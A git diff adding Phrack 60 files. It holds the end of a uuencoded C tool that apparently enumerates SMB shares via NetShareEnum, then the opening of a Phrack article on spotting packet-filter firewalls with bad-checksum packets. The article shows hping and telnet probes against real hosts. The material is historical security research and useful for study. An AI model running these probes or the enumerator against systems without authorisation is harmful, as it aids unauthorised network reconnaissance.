+M("`@("`@("`@("`@("A086-K970@*R!S:7IE;V8H3F)T4V5S<VEO;DAD<BD-
+M"B`@("`@("`@("`@("`@("`@("L@<VEZ96]F*%-M8D)A<V5(9'(I*3L-"@T*
+M#0HO*E-E="!V86QU92!O9B!T:&4@;6%X:6UU;2!S:7IE(&]F(&1A=&$@=&\@
+M<F5C96EV92HO#0H-"B!3971U<%A297%U97-T+3Y-87A"=69F97)3:7IE6S%=
+M/3!X1D8[#0H-"B\J0G5I;&0@=&AE(%-E='5P6"!H96%D97(J+PT*#0H@4V5T
+M=7!84F5Q=65S="T^5V]R9$-O=6YT/3!X9#L-"@T*(%-E='5P6%)E<75E<W0M
+M/D%N9%A#;VUM86YD/3!X9F8[#0H-"B`O*D=I=F4@82!S:7IE(&]F('1H92!P
+M87-S=V]R9"!3=')I;F<@*$YU;&P@8VAA<F%C=&5R*2P@#0H@("H@9F]R($%.
+M4TD@0VAA<F%C=&5R("AT:&4@#0H@("H@54Y)0T]$12!S=')I;F=S(&%R92!N
+M;W0@<W5P<&]R=&5D*B\-"@T*(%-E='5P6%)E<75E<W0M/D-A<V5);G-E;G-I
+M=&EV95!A<W-W;W)D3&5N9W1H6S!=(#T@,'@P.PT*#0H@+RH@0V]U;G0@;V8@
+M9&%T82!B>71E<RHO#0H-"B!3971U<%A297%U97-T+3Y">71E0V]U;G1;,%T@
+M/2`@#0H@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@1&]M86EN3F%M
+M94QE;F=T:"`K(#$@*PT*("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M('-I>F5O9BA.051)5D5?3U-?3$%.34%.*3L-"B`-"@T*(&UE;6-P>2@H=5]C
+M:&%R("H@*2`H4&%C:V5T("L@#0H@("`@("`@("`@("`@("`@("`@("!S:7IE
+M;V8H3F)T4V5S<VEO;DAD<BD@*R`-"B`@("`@("`@("`@("`@("`@("`@('-I
+M>F5O9BA3;6)"87-E2&1R*2`K(`T*("`@("`@("`@("`@("`@("`@("`@<VEZ
+M96]F*%-M8E-E='5P6%)E<75E<W1(9'(I("L-"B`@("`@("`@("`@("`@("`@
+M("`@(#$I+`T*("`@("`@("`@("`@("`@("`@("`@1&]M86EN3F%M92P-"B`@
+M("`@("`@("`@("`@("`@("`@($1O;6%I;DYA;65,96YG=&@I.PT*#0HO*B!)
+M;F-R96UE;G1A=&EO;B!O9B!$;VUA:6Y.86UE3&5N9W1H+"`-"B`J('1O(&AA
+M=F4@82!N=6QL(&-H87)A8W1E<B!T97)M:6YA=&5D('-T<FEN9PT*("H@(&9O
+M<B!T:&4@9&]M86EN(&YA;64@<W1R:6YG*B\-"@T*($1O;6%I;DYA;65,96YG
+M=&@K*SL-"@T*(&UE;6-P>2@H=5]C:&%R("H@*2`H4&%C:V5T("L@#0H@("`@
+M("`@("`@("`@("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<BD@*R`-"B`@
+M("`@("`@("`@("`@("`@("`@('-I>F5O9BA3;6)"87-E2&1R*2`K(`T*("`@
+M("`@("`@("`@("`@("`@("`@<VEZ96]F*%-M8E-E='5P6%)E<75E<W1(9'(I
+M("L@#0H@("`@("`@("`@("`@("`@("`@("!$;VUA:6Y.86UE3&5N9W1H*2P-
+M"B`@("`@("`@("`@("`@("`@("`@($Y!5$E615]/4U],04Y-04XL#0H@("`@
+M("`@("`@("`@("`@("`@("!S:7IE;V8H3D%4259%7T]37TQ!3DU!3BDI.PT*
+M#0HO*E=E('-E;F0@=&AE(%!A8VME="!W:71H('1H92!N971B:6]S(&AE861E
+M<B!S;R!W92!M=7-T(&%D9"!I="HO#0H-"B!086-K971,96YG=&@@/2!S:7IE
+M;V8H4VUB0F%S94AD<BD@*PT*("`@("`@("`@("`@("`@('-I>F5O9BA3;6)3
+M971U<%A297%U97-T2&1R*2`K#0H@("`@("`@("`@("`@("`@1&]M86EN3F%M
+M94QE;F=T:"`K(`T*("`@("`@("`@("`@("`@('-I>F5O9BA.051)5D5?3U-?
+M3$%.34%.*2`K#0H@("`@("`@("`@("`@("`@<VEZ96]F*$YB=%-E<W-I;VY(
+M9'(I(#L@#0H-"B!W<FET92A3;V-K+%!A8VME="Q086-K971,96YG=&@I.PT*
+M#0H@9G)E92A086-K970I.PT*?0T*#0HO*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHO#0H-"B\O5&AI<R!F=6YC=&EO;B!S96YD<R!A(%1C;VY8(%)E<75E<W0@
+M4&%C:V5T#0H-"G9O:60@4V5N9%1C;VY84F5Q=65S="AI;G0@4V]C:RQU7V-H
+M87(@*E-M8E-E<G9E<DEP*0T*>PT*(&EN="!086-K971,96YG=&@[#0H@=5]C
+M:&%R("I086-K970[#0H@=5]C:&%R("I0871H.PT*#0H@4VUB0F%S94AD<B`J
+M4VUB0F%S93L-"B!3;6)48V]N6%)E<75E<W1(9'(@*E1C;VY84F5Q=65S=#L-
+M"@T*#0HO*B!4:&4@;&5N9W1H(&]F('1H92!P86-K970@.B`@4VUB($)A<V4@
+M2&5A9&5R("L@#0H@*B!3;6(@5$-O;E@@4F5Q=65S=`T*("H@*R!P87)A;65T
+M97)S('-T<FEN9W,L(`T*("H@*R`Q(&9O<B!T:&4@;&5N9W1H(&]F('1H92!P
+M87-S=V]R9"`J+PT*#0H-"B!086-K971,96YG=&@@/0ES:7IE;V8H4VUB0F%S
+M94AD<BD@*PT*("`@("`@("`@("`@("`@('-I>F5O9BA3;6)48V]N6%)E<75E
+M<W1(9'(I("L-"B`@("`@("`@("`@("`@("!S=')L96XH(EQ<7%Q<7"(I("L-
+M"B`@("`@("`@("`@("`@("!S=')L96XH4VUB4V5R=F5R27`I("L-"B`@("`@
+M("`@("`@("`@("!S:7IE;V8H5$-/3EA?0T]-34%.1"D@*PT*("`@("`@("`@
+M("`@("`@(#$@.PT*(`T*(%!A8VME="`]("AU7V-H87(@*BD@;6%L;&]C*"A0
+M86-K971,96YG=&@@*PT*("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M<VEZ96]F*$YB=%-E<W-I;VY(9'(I*2`-"B`@("`@("`@("`@("`@("`@("`@
+M("`@("`@("`@("H@<VEZ96]F*'5?8VAA<BDI.PT*#0H-"B\J0G5I;&0@=&AE
+M($YE=&)I;W,@2&5A9&5R*B\-"@T*#0H@0G5I;&1.8G0H4&%C:V5T+%!A8VME
+M=$QE;F=T:"D[#0H-"B\J0G5I;&0@=&AE(%--0B!"87-E($AE861E<BHO#0H-
+M"B!"=6EL9%-M8D)A<V5(9'(H4&%C:V5T+#!X-S4I.PT*#0H@4VUB0F%S92`]
+M("A3;6)"87-E2&1R("HI("A086-K970@*R`-"B`@("`@("`@("`@("`@("`@
+M("`@("`@("`@('-I>F5O9BA.8G1397-S:6]N2&1R*2D[#0H-"B!3;6)"87-E
+M+3Y5:61;,%T],'@V-#L-"B`-"B\J0G5I;&0@=&AE(%1C;VY8(')E<75E<W0@
+M:&5A9&5R*B\-"@T*(%1C;VY84F5Q=65S="`]("A3;6)48V]N6%)E<75E<W1(
+M9'(@*BD@#0H@("`@("`@("`@("`@("`@*%!A8VME="`K(`T*("`@("`@("`@
+M("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<BD@*R`-"B`@("`@("`@("`@
+M("`@("`@<VEZ96]F*%-M8D)A<V5(9'(I*3L-"@T*(%1C;VY84F5Q=65S="T^
+M5V]R9$-O=6YT/3!X,#0[#0H-"B!48V]N6%)E<75E<W0M/D%N9%A#;VUM86YD
+M/3!X9F8[#0H-"B`O*D=I=F4@82!S:7IE(&9O<B!T:&4@<&%S<W=O<F0@4W1R
+M:6YG("A.=6QL(&-H87)A8W1E<BDJ+PT*#0H@5&-O;EA297%U97-T+3Y087-S
+M=V]R9$QE;F=T:%LP72`](#!X,3L-"@T*("\J1VEV92!A('9A;'5E('1O('1H
+M92`B0GET94-O=6YT(B!F:65L9"HO#0H-"B!48V]N6%)E<75E<W0M/D)Y=&5#
+M;W5N=%LP72`](`T*"0D)"7-T<FQE;B@B7%Q<7%Q<(BD@*PT*"0D)"2L@<W1R
+M;&5N*%-M8E-E<G9E<DEP*2`K#0H)"0D)*R!S:7IE;V8H5$-/3EA?0T]-34%.
+M1"D@*PT*"0D)"3$@.PT*#0H@+RI"=6EL9"!T:&4@4&%T:"!3=')I;F<J+PT*
+M#0H@4&%T:"`]("AU7V-H87(@*BD@*&UA;&QO8RAS=')L96XH(EQ<7%Q<7"(I
+M*PT*("`@("`@("`@("`@("`@("`@("!S=')L96XH4VUB4V5R=F5R27`I*2D[
+M(`T*("`-"B!M96US970H4&%T:"PP+`T*("`@("`@("!S=')L96XH(EQ<7%Q<
+M7"(I*W-T<FQE;BA3;6)397)V97))<"DI.PT*(`T*('-T<FYC<'DH4&%T:"PB
+M7%Q<7"(L<W1R;&5N*")<7%Q<(BDI.PT*(`T*('-T<FYC870H4&%T:"Q3;6)3
+M97)V97))<"QS=')L96XH4VUB4V5R=F5R27`I*3L-"B`-"B!S=')N8V%T*%!A
+M=&@L(EQ<(BQS=')L96XH(EQ<(BDI.PT*#0H@;65M8W!Y*"AU7V-H87(@*BD@
+M*%!A8VME="`K(`T*("`@("`@("`@("`@("`@("`@("!S:7IE;V8H3F)T4V5S
+M<VEO;DAD<BD@*R`-"B`@("`@("`@("`@("`@("`@("`@<VEZ96]F*%-M8D)A
+M<V5(9'(I*PT*("`@("`@("`@("`@("`@("`@("!S:7IE;V8H4VUB5&-O;EA2
+M97%U97-T2&1R*2LQ*2P-"B`@("`@("`@("`@("`@("`@("`@4&%T:"P-"B`@
+M("`@("`@("`@("`@("`@("`@<W1R;&5N*%!A=&@I*3L-"@T*(&UE;6-P>2@H
+M=5]C:&%R("H@*2`H4&%C:V5T("L@#0H@("`@("`@("`@("`@("`@("`@("!S
+M:7IE;V8H3F)T4V5S<VEO;DAD<BD@*R`-"B`@("`@("`@("`@("`@("`@("`@
+M('-I>F5O9BA3;6)"87-E2&1R*2`K(`T*("`@("`@("`@("`@("`@("`@("`@
+M<VEZ96]F*%-M8E1C;VY84F5Q=65S=$AD<BD@*R`-"B`@("`@("`@("`@("`@
+M("`@("`@('-T<FQE;BA0871H*2`K(#$I+`T*("`@("`@("`@("`@("`@("`@
+M("`@5$-/3EA?0T]-34%.1"P-"B`@("`@("`@("`@("`@("`@("`@('-I>F5O
+M9BA40T].6%]#3TU-04Y$*2D[#0H-"B\J4V5N9"!T:&4@4&%C:V5T*B\-"@T*
+M(%!A8VME=$QE;F=T:"`]"7-I>F5O9BA3;6)"87-E2&1R*2`K#0H@("`@("`@
+M("`@("`@("`@<VEZ96]F*%-M8E1C;VY84F5Q=65S=$AD<BD@*PT*("`@("`@
+M("`@("`@("`@('-T<FQE;B@B7%Q<7%Q<(BD@*PT*("`@("`@("`@("`@("`@
+M('-T<FQE;BA3;6)397)V97))<"D@*PT*("`@("`@("`@("`@("`@('-I>F5O
+M9BA40T].6%]#3TU-04Y$*2`K#0H@("`@("`@("`@("`@("`@,2`K('-I>F5O
+M9BA.8G1397-S:6]N2&1R*3L-"@T*('=R:71E*%-O8VLL4&%C:V5T+%!A8VME
+M=$QE;F=T:"D[#0H-"B!F<F5E*%!A8VME="D[#0I]#0H-"B\J*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*B\-"@T*+RH@5&AI<R!F=6YC=&EO;B!S96YD<R!A(%1R
+M86YS86-T:6]N(')E<75E<W0@4&%C:V5T*B\-"@T*=F]I9"!396YD5')A;G-2
+M97%U97-T*`T*("`@("`@("`@("`@("`@("`@("`@("\J3W5R('-O8VME="HO
+M#0H@("`@("`@("`@("`@("`@("`@("`@:6YT(%-O8VLL(`T*("`@("`@("`@
+M("`@("`@("`@("`@("\J1F]R('1H92!4240@9FEE;&0J+PT*("`@("`@("`@
+M("`@("`@("`@("`@('5?:6YT.%]T("I4:60I#0I[#0H@=5]C:&%R("I086-K
+M970[#0H@:6YT(%!A8VME=$QE;F=T:#L-"B!3;6)"87-E2&1R("I3;6)"87-E
+M.PT*(%-M8E1R86YS4F5Q=65S=$AD<B`J5')A;G-297%U97-T.PT*#0HO*B!4
+M:&4@;&5N9W1H(&]F('1H92!P86-K970@*%-M8B!"87-E($AE861E<B`K(`T*
+M("H@4VUB(%1R86YS86-T:6]N(%)E<75E<W0-"B`J("L@1&EA;&5C="!S=')I
+M;F<@*"TQ(&9O<B!A;B!A;&EG;F5M96YT('!R;V)L96TI*B\-"@T*#0I086-K
+M971,96YG=&@@/0ES:7IE;V8H4VUB0F%S94AD<BD@*R`-"B`@("`@("`@("`@
+M("`@("!S:7IE;V8H4VUB5')A;G-297%U97-T2&1R*2`K#0H@("`@("`@("`@
+M("`@("`@<VEZ96]F*$Y!345?4D%07T-/34U!3D0I+3$[#0H-"E!A8VME="`]
+M("AU7V-H87(@*BD@*&UA;&QO8R@H4&%C:V5T3&5N9W1H("L@#0H@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@('-I>F5O9BA.8G1397-S:6]N2&1R*2D-
+M"B`@("`@("`@("`@("`@("`@("`@("`@("`@("`@*B!S:7IE;V8H=5]C:&%R
+M*2DI.PT*#0H-"B\J($)U:6QD('1H92!.971B:6]S($AE861E<B`J+PT*#0H@
+M0G5I;&1.8G0H4&%C:V5T+%!A8VME=$QE;F=T:"D[#0H-"B\J($)U:6QD('1H
+M92!334(@0F%S92!(96%D97(@*B\-"@T*($)U:6QD4VUB0F%S94AD<BA086-K
+M970L,'@R-2D[#0H-"B\J(%1)1"!N=6UB97(@9F]R('1H92!3;6(@0F%S92!(
+M96%D97(J+PT*#0I3;6)"87-E(#T@*%-M8D)A<V5(9'(@*BD@*%!A8VME="`K
+M(`T*("`@("`@("`@("`@("`@("`@("`@("`@("!S:7IE;V8H3F)T4V5S<VEO
+M;DAD<BDI.PT*#0IM96UC<'DH4VUB0F%S92T^5&ED+%1I9"PR*G-I>F5O9BAU
+M7VEN=#A?="DI.PT*#0HO*D)U:6QD(%1H92!3;6(@5')A;G-A8W1I;VX@4F5Q
+M=65S="!(96%D97(J+PT*#0I4<F%N<U)E<75E<W0@/2`H4VUB5')A;G-297%U
+M97-T2&1R("H@*2`-"B`@("`@("`@("`@("`@("@@4&%C:V5T("L@#0H@("`@
+M("`@("`@("`@("`@('-I>F5O9BA.8G1397-S:6]N2&1R*2`-"B`@("`@("`@
+M("`@("`@("`@*R!S:7IE;V8H4VUB0F%S94AD<BDI.PT*#0HO*B!7;W)D0V]U
+M;G1#;W5N="`](#$T("L@4V5T=7!#;W5N="`-"B`J(&)U="!3971U<$-O=6YT
+M(#T@,"!S;R!7;W)D0V]U;G0@/3$T("HO#0H-"E1R86YS4F5Q=65S="T^5V]R
+M9$-O=6YT/3$T.PT*#0HO*B!087)A;65T97)#;W5N="!I<R!T:&4@8GET92!C
+M;W5N="!O9@T*("H@=&AE('!A<F%M971E<G,@8GET97,@9F]R('1H92!205`@
+M4D5154535"`@#0H@*B`H3F5T4VAA<F5%;G5M(&9U;F-T:6]N*2!S;R`Q.0T*
+M("H@8GET97,@*B\-"@T*5')A;G-297%U97-T+3Y087)A;65T97)#;W5N=%LP
+M72`](#$Y.PT*#0H-"B\J5V4@;F5E9"!J=7-T(&]N92!P86-K970@=&\@<V5N
+M9"!T:&4@<&%R86UE=&5R<R`-"B`J('-O(%1O=&%L4&%R86UE=&5R0V]U;G0@
+M:7,@97%U86P@=&\@4&%R86UE=&5R(&-O=6YT*B\-"@T*(%1R86YS4F5Q=65S
+M="T^5&]T86Q087)A;65T97)#;W5N=%LP72`](#$Y.PT*#0HO*D9O<B!T:&4@
+M;6%X('-I>F4@;V8@9&%T82!A;F0@<&%R86UE=&5R<R`-"B`J('=E('!U="!A
+M(&)I9R!V86QU92HO#0H-"B!4<F%N<U)E<75E<W0M/DUA>%!A<F%M971E<D-O
+M=6YT6S%=/3!X,#0[#0H@5')A;G-297%U97-T+3Y-87A$871A0V]U;G1;,5T]
+M,'A&1CL-"B!4<F%N<U)E<75E<W0M/DUA>$1A=&%#;W5N=%LP73TP>$9&.PT*
+M#0HO*DYO($1A=&$L('-O(%1O=&%L1&%T84-O=6YT(&%N9"!$871A0V]U;G0@
+M87)E(&5Q=6%L('1O('IE<F\J+PT*#0H@5')A;G-297%U97-T+3Y4;W1A;$1A
+M=&%#;W5N=%LP73TP.PT*#0H@5')A;G-297%U97-T+3Y$871A0V]U;G1;,%T]
+M,#L-"@T*+RI4:&4@;V9F<V5T(&9R;VT@=&AE(&9I<G-T(&)Y=&4@;V8@=&AE
+M(%-M8B!"87-E(`T*("H@2&5A9&5R('1O('1H92!P87)A;65T97(@:7,@-S8@
+M8GET97,@*B\-"@T*(%1R86YS4F5Q=65S="T^4&%R86UE=&5R3V9F<V5T6S!=
+M/3<V.PT*#0HO*E1H97)E(&ES(&YO(&1A=&$@#0H@*B!S;R!T:&4@;V9F<V5T
+M(&ES(&5Q=6%L('1O('1H92!T;W1A;"!S:7IE("HO#0H-"B!4<F%N<U)E<75E
+M<W0M/D1A=&%/9F9S971;,%T].34[#0H-"B\J4V5T=7!#;W5N="!I<R!E<75A
+M;"!T;R!Z97)O*B\-"@T*(%1R86YS4F5Q=65S="T^4V5T=7!#;W5N=#TP.PT*
+M#0HO*D)Y=&5#;W5N="`](&QE;F=T:"!O9B!T:&4@(DYA;64B('-T<FEN9R`H
+M,3,@8GET97,I("`-"B`J(&%N9"!T:&4@4&%R86UE=&5R(&9I96QD("@Q.2!B
+M>71E<RDJ+PT*#0H@5')A;G-297%U97-T+3Y">71E0V]U;G1;,%T],S([#0H-
+M"B\J0V]P>2!T:&4@;F%M92!S=')I;F<@9F]R($YE='-H87)E16YU;2!F=6YC
+M=&EO;BHO#0H-"B!M96UC<'DH*'5?8VAA<B`J*2`H4&%C:V5T("L@#0H@("`@
+M("`@("`@("`@("`@("`@<VEZ96]F*$YB=%-E<W-I;VY(9'(I("L-"B`@("`@
+M("`@("`@("`@("`@("!S:7IE;V8H4VUB0F%S94AD<BD@*PT*("`@("`@("`@
+M("`@("`@("`@('-I>F5O9BA3;6)4<F%N<U)E<75E<W1(9'(I*2P-"B`@("`@
+M("`@("`@("`@("`@("!.04U%7U)!4%]#3TU-04Y$+`T*("`@("`@("`@("`@
+M("`@("`@('-I>F5O9BA.04U%7U)!4%]#3TU-04Y$*2TQ*3L-"@T*(%!A8VME
+M=$QE;F=T:"`]"7-I>F5O9BA3;6)"87-E2&1R*2`K#0H@("`@("`@("`@("`@
+M("`@<VEZ96]F*%-M8E1R86YS4F5Q=65S=$AD<BD@*PT*("`@("`@("`@("`@
+M("`@('-I>F5O9BA.04U%7U)!4%]#3TU-04Y$*2`M,2`K(`T*("`@("`@("`@
+M("`@("`@('-I>F5O9BA.8G1397-S:6]N2&1R*3L-"B`-"B!W<FET92A3;V-K
+M+%!A8VME="Q086-K971,96YG=&@I.PT*#0H@9G)E92A086-K970I.PT*?0T*
+M#0HO*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ#0H@("`@("`@("`@("`@("`@
+M("`@("`@("`@(%1(12!-04E.($953D-424].#0HJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHO#0H-"F5X=&5R;B!C:&%R("IO<'1A<F<[#0IE>'1E<FX@:6YT
+M(&]P=&EN9#L-"F5X=&5R;B!I;G0@;W!T97)R.PT*#0II;G0@;6%I;BAI;G0@
+M87)G8RP@8VAA<B`J87)G=EM=*0T*>PT*('-T871I8R!C:&%R(&]P='-T<FEN
+M9UM=(#T@(F,Z<SHB.PT*(&EN="!O<'1C:#L-"@T*+RI4:&4@<V]C:V5T+"!T
+M;R!I;FIE8W0@<&%C:V5T<RHO#0H@#0H@:6YT(%-O8VL[#0H-"B\J5&AE('-T
+M<FEN9R!F;W(@=&AE(%--0B!D;VUA:6X@;F%M92HO(`T*(`T*(&-H87(@*D1O
+M;6%I;DYA;64[#0H@#0HO*E1H92!,96YG=&@@;V8@=&AE(")$;VUA:6Y.86UE
+M(B!S=')I;F<J+PT*(`T*(&EN="!$;VUA:6Y.86UE3&5N9W1H.PT*#0HO*E1H
+M92!4240@;G5M8F5R(&9O<B!T:&4@5$-/3E@@86YD(%1204Y304-424].('!A
+M8VME=',J+PT*(`T*('5?:6YT.%]T("I4:60[#0H-"B\J5&AE(")N;W)M86PB
+M(&-L:65N="!.151"24]3(&YA;64J+PT*(`T*(&-H87(@0VQI96YT6S$V73L-
+M"@T*+RI4:&4@<V5R=F5R)W,@25`@861R97-S*B\@#0H@#0H@8VAA<B!397)V
+M97);,39=.PT*#0H@8VAA<B!086-K971;-#`Y-ET[#0H-"B!S=')U8W0@<V]C
+M:V%D9')?:6X@4VUB4V5R=F5R.PT*(`T*#0H@:68H87)G8R`\(#4I#0H@>PT*
+M("!P<FEN=&8H(EQN(%-C86Y3:&%R92`M8R!C;&EE;G0G<R!N86UE("US('-E
+M<G9E<B=S($E0(&%D<F5S<UQN(BD[#0H@(')E='5R;B`P.PT*('T-"B`-"B!W
+M:&EL92@H;W!T8V@](&=E=&]P="AA<F=C+&%R9W8L;W!T<W1R:6YG*2DA/45/
+M1BD-"B![#0H@('-W:71C:"AO<'1C:"D-"B`@>PT*("`@8V%S92`G8R<Z#0H@
+M("`@+RH@5&AE($Y%5$))3U,@;F%M92!I<R`Q-B!L;VYG+`T*("`@("`J('1H
+M92`Q-2!F:7)S="!C:&%R86-T97)S(&%R92!F;W(@=&AE(&YA;64J+PT*#0H@
+M("`@;65M<V5T*$-L:65N="PP+#$V*3L-"B`@("!S=')N8W!Y*$-L:65N="QO
+M<'1A<F<L<W1R;&5N*&]P=&%R9RDI.PT*("`@(`T*("`@("\J(%1H92!L87-T
+M(&-H87)A8W1E<B!G:79E<R!T:&4@='EP92!O9@T*("`@("`J(&-O;7!U=&5R
+M+"!I;B!T:&ES(&-A<V4@+"`P>#`P(')E<')E<V5N=',-"B`@("`@*B!A('=O
+M<FMS=&%T:6]N*B\-"B`@("`-"B`@("!#;&EE;G1;,35=/3!X,#`[#0H@("`@
+M8G)E86L[#0H-"B`@(&-A<V4@)W,G.@T*("`@("\J5&AE('-A;64@9F]R('1H
+M92!S97)V97(J+PT*("`@(`T*("`@(&UE;7-E="A397)V97(L,"PQ-BIS:7IE
+M;V8H8VAA<BDI.PT*("`@('-T<FYC<'DH4V5R=F5R+&]P=&%R9RQS=')L96XH
+M;W!T87)G*2D[#0H@("`@#0H@("`@+RHP>#(P(')E<')E<V5N=',@82!334(@
+M<V5R=F5R*B\-"B`@("`-"B`@("!397)V97);,35=/3!X,C`[#0H@("`@8G)E
+M86L[#0H-"B`@(&1E9F%U;'0@.@T*("`@('!R:6YT9B@B7&X@4V-A;E-H87)E
+M("UC(&-L:65N="=S(&YA;64@+7,@<V5R=F5R)W,@25`@861R97-S7&XB*3L-
+M"B`@("!R971U<FX@,#L-"B`@('T-"B`@?0T*#0H@#0H-"@T*(%1I9"`]("AU
+M7VEN=#A?="`J*2`H;6%L;&]C*#(@*B!S:7IE;V8H=5]I;G0X7W0I*2D[#0H-
+M"B!3;V-K/7-O8VME="A!1E])3D54+%-/0TM?4U1214%-+#`I.PT*#0HO*D-R
+M96%T92!O=7(@<V]C:V5T*B\@#0H@#0H@4VUB4V5R=F5R+G-I;E]F86UI;'D]
+M($%&7TE.150[#0H@#0HO*D-O;FYE8W1I;VX@=&\@=&AE('!O<G0@,3,Y*B\-
+M"B`-"B!3;6)397)V97(N<VEN7W!O<G0@/2!H=&]N<RA334)?4$]25"D[(`T*
+M(&EN971?871O;BA397)V97(L)E-M8E-E<G9E<BYS:6Y?861D<BD[#0H-"B!C
+M;VYN96-T*`T*("`@("`@("`@4V]C:RP-"B`@("`@("`@("AS=')U8W0@<V]C
+M:V%D9'(J("D@*"93;6)397)V97(I+`T*("`@("`@("`@<VEZ96]F*'-T<G5C
+M="!S;V-K861D<E]I;BDI.PT*#0HO*B!4:&ES(&9U;F-T:6]N('-E;F1S(&$@
+M3D540DE/4R!297%U97-T('!A8VME="!W:71H(`T*("H@=&AE(&5N8V]D960@
+M3D540DE/4R!N86UE<R`J+PT*#0H@4V5N9$YE=$)I;W-.86UE4F5Q=65S="A3
+M;V-K+$-L:65N="Q397)V97(I.PT*#0HO*E=A:71I;F<@9F]R('1H92!R97-P
+M;VYS92HO#0H@#0H@<F5A9"A3;V-K+%!A8VME="PT,#DV*3L-"@T*+RH@5&AI
+M<R!F=6YC=&EO;B!S96YD<R!T:&4@3F5G4')O="!297%U97-T('!A8VME="HO
+M#0H@#0H@4V5N9$YE9U!R;W1297%U97-T*%-O8VLI.PT*#0HO*B!792!R96-E
+M:79E('1H92!R97-P;VYS92!A;F0@=V4@86YA;'ES92!I=`T*("H@=&\@:&%V
+M92!T:&4@4TU"(&1O;6%I;B!N86UE*B\-"B`-"B!$;VUA:6Y.86UE(#T@4F5C
+M96EV94YE9U!R;W1297!L>2A3;V-K+"`F1&]M86EN3F%M94QE;F=T:"D[#0H-
+M"B\J(%1H:7,@9G5N8W1I;VX@<V5N9',@=&AE(%-E='5P6"!R97%U97-T('!A
+M8VME="HO#0H@#0H@4V5N9%-E='5P6%)E<75E<W0H4V]C:RQ$;VUA:6Y.86UE
+M3&5N9W1H+$1O;6%I;DYA;64I.R`-"@T*+RH@=V4@<F5C96EV92!T:&4@<F5S
+M<&]N<V4J+PT*(`T*(')E860H4V]C:RQ086-K970L-#`Y-BD[#0H-"B\J5&AI
+M<R!F=6YC=&EO;B!S96YD<R!T:&4@5&-O;G@@<F5Q=65S="!P86-K970J+PT*
+M(`T*(%-E;F148V]N6%)E<75E<W0H4V]C:RQ397)V97(I.PT*#0HO*B!792!R
+M96-E:79E('1H92!R97-P;VYS92!A;F0@=V4@86YA;'ES92!I="`-"B`J('1O
+M(&AA=F4@=&AE(%1)1"!N=6UB97(J+PT*(`T*(%)E8V5I=F548V]N6%)E<&QY
+M*%-O8VLL5&ED*3L-"B`-"B\J(%1H:7,@9G5N8W1I;VX@<V5N9',@=&AE(%1R
+M86YS86-T:6]N(')E<75E<W0@<&%C:V5T#0H@*B!W:71H(%)!4"!C;VUM86YD
+M($YE=%-H87)E16YU;2HO#0H@#0H@4V5N9%1R86YS4F5Q=65S="A3;V-K+%1I
+M9"D[#0H-"B\J5V4@86YA;'ES92!T:&4@<F5S<&]N<V4J+PT*(`T*(%)E8V5I
+I=F54<F%N<U)E<&QY*%-O8VLI.PT*(`T*(')E='5R;B`P.PT*?0T*#0H`
+`
+end
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack60/12.txt b/phrack60/12.txt
new file mode 100644
index 0000000..041fff2
--- /dev/null
+++ b/phrack60/12.txt
@@ -0,0 +1,717 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x0c of 0x10
+
+|=----=[ Firewall spotting and networks analisys with a broken CRC ]=----=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------------=[ Ed3f ]=--------------------------------=|
+
+
+--[ Contents
+
+  0 - School
+
+  1 - Something In The Way
+
+  2 - Come As You Are
+
+  3 - You Know You're Right
+
+  4 - Drain You
+
+  5 - Big Long Now
+
+
+--[ 0 - School
+
+    Packet filters firewall are going to be deployed more and more for the
+sense of security the word "firewall" has got on not-technical people.
+Available as commercial software, embedded device or inside opensource OS
+they work at level 3. The support for level 4 isn't complete: they filter
+ports numbers, TCP flags, seq numbers, defragmentation, but ...
+
+What about level 4 checksum?
+
+Are they checking for TCP checksum before analyze flags or port numbers?
+No.
+
+    Most developers say there would be too overhead and other think that
+the packet will be simply dropped by destination OS stack. All correct, but
+how could we take advantage of this "feature"?
+
+1) firewalls reply spotting
+2) damn 31337 MiM spotting
+3) insert invalid packets inside a network
+
+
+--[ 1 - Something In The Way
+
+    A complete network stack will drop invalid packets without response. No
+matter if that port is closed, open or whatever... But Packet Filters
+aren't so smart and they will reply.
+
+    If we want to determine if there is a packet filter between us and a
+target host we must first check if the packet filter is configured to drop
+the packets or to send back an error. For this we send a valid tcp packet
+to any port that is supposed to be filtered:
+
+# telnet www.oracle.com 31337
+Trying 148.87.9.44...
+telnet: Unable to connect to remote host: Connection refused
+
+    Good. Either the target host itself or a packet filter sends back a
+RST. Next step is to check if the RST comes from the target host or from
+a packet filter:
+
+# hping -S -c 1 -p 31337 -b www.oracle.com
+HPING www.oracle.com (rl0 148.87.9.44): S set, 40 headers + 0 data bytes
+len=46 ip=148.87.9.44 flags=RA seq=0 ttl=23 id=52897 win=512 rtt=459.8 ms
+
+    If we get a reply we know that a packet filter is in place. If we
+dont get a reply we suspect that the packet arrives unfiltered at the
+destination host and is dropped by the TCP stack (e.g. no packet filter is
+in place).
+
+    Another technique to detect the existence of a packet filter is to
+compare the TTL of a RST and a SYN (which comes directly from the target
+host). The TTL-technique fails for all packet filters in bridging mode
+or filters that do not decrease the TTL and are placed directly in front
+of the target host (normal DMZ setup). The CRC-technique as described
+above on the other hand detects a packet filtering device in both cases.
+
+
+Other example, UDP this time:
+
+# hping -2 -c 1 -p 53 -b www.redhat.com
